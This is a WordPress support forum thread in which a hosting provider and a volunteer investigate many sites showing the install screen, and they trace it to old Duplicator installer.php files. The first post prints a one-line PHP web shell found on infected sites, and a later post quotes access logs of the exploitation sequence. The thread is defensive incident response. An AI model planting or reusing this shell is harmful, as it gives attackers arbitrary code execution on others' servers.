Support » Fixing WordPress » wp-config.php goes missing – for a lot of customers

  • dennishermannsen

    (@dennishermannsen)



    Hi,

    The last couple of hours, our support has been targeted with A LOT of emails that all revolve around the same issue; a customer’s WordPress website suddenly displays the installation process.

    It all seems very related to CVE-2018-12895, but this should’ve been fixed in 4.9.7, and we have customers affected by this that runs the latest version of WordPress.

    We’ve had multiple reports the entire day, across multiple hosting companies in multiple datacenters with very different setups.

    Is there an exploit I don’t know about?

    Edit:
    For all infected versions, we see a file called wp-crawl.php in the WP-root. Contents:

    
    <?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>
    
Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Support Team Volunteer

    te_taipo

    (@te_taipo)

    Any common 3rd party plugins? Reason is I am currently watching the development of what looks like an attack vector against a file manager plugin.

    dennishermannsen

    (@dennishermannsen)

    I haven’t had the time to compare all the plugins across the infected websites. This seems to be the common process:

    xx.xx.xx.xx - - [06/Sep/2018:18:54:44 +0200] "GET / HTTP/1.1" 200 25833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer.php HTTP/1.1" 200 309 "<em>deleted</em>.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer-backup.php HTTP/1.1" 200 309 "<em>deleted</em>.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-config.php HTTP/1.1" 500 204 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-admin/setup-config.php HTTP/1.1" 200 4055 "http://<em>deleted</em>.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:46 +0200] "GET /wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:47 +0200] "GET /wp-content/uploads/wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    dennishermannsen

    (@dennishermannsen)

    Oh damn.. The installer.php seems to be a duplicator file. Same procedure for _ever_ single infected website.
    Not sure if it’s really Duplicator code inside of it.Shit, it is.

    Can anyone possibly confirm whether or not they have duplicator installed and have been targeted?

    te_taipo

    (@te_taipo)

    You will have to go back further in the logs to see how installer.php and other non-WP files were installed. This log is the attacker utilising already uploaded attack files.

    But since you may have the ability to query a few users who have this issue, working out which 3rd party plugins they have in common will narrow this down, in particular if they have a plugin in common that handles file managing (for example)

    dennishermannsen

    (@dennishermannsen)

    https://db.threatpress.com/vulnerability/duplicator/wordpress-duplicator-plugin-1-2-40-arbitrary-code-execution-vulnerability

    It really is Duplicator.
    All the infected installations have Duplicator installed, and the installer.php file is often very old.

    te_taipo

    (@te_taipo)

    What version of Duplicator was installed?

    dennishermannsen

    (@dennishermannsen)

    Duplicator doesn’t have to be installed. Previous versions of Duplicator didn’t remove the installer.php file, and this file could be exploited.

    I’m not sure whether or not upgrading to the latest version of Duplicator would remove the file. We just made a script that grepped for a certain string in all installer.php files and deleted them.

    te_taipo

    (@te_taipo)

    That makes sense.

Viewing 9 replies - 1 through 9 (of 9 total)
  • You must be logged in to reply to this topic.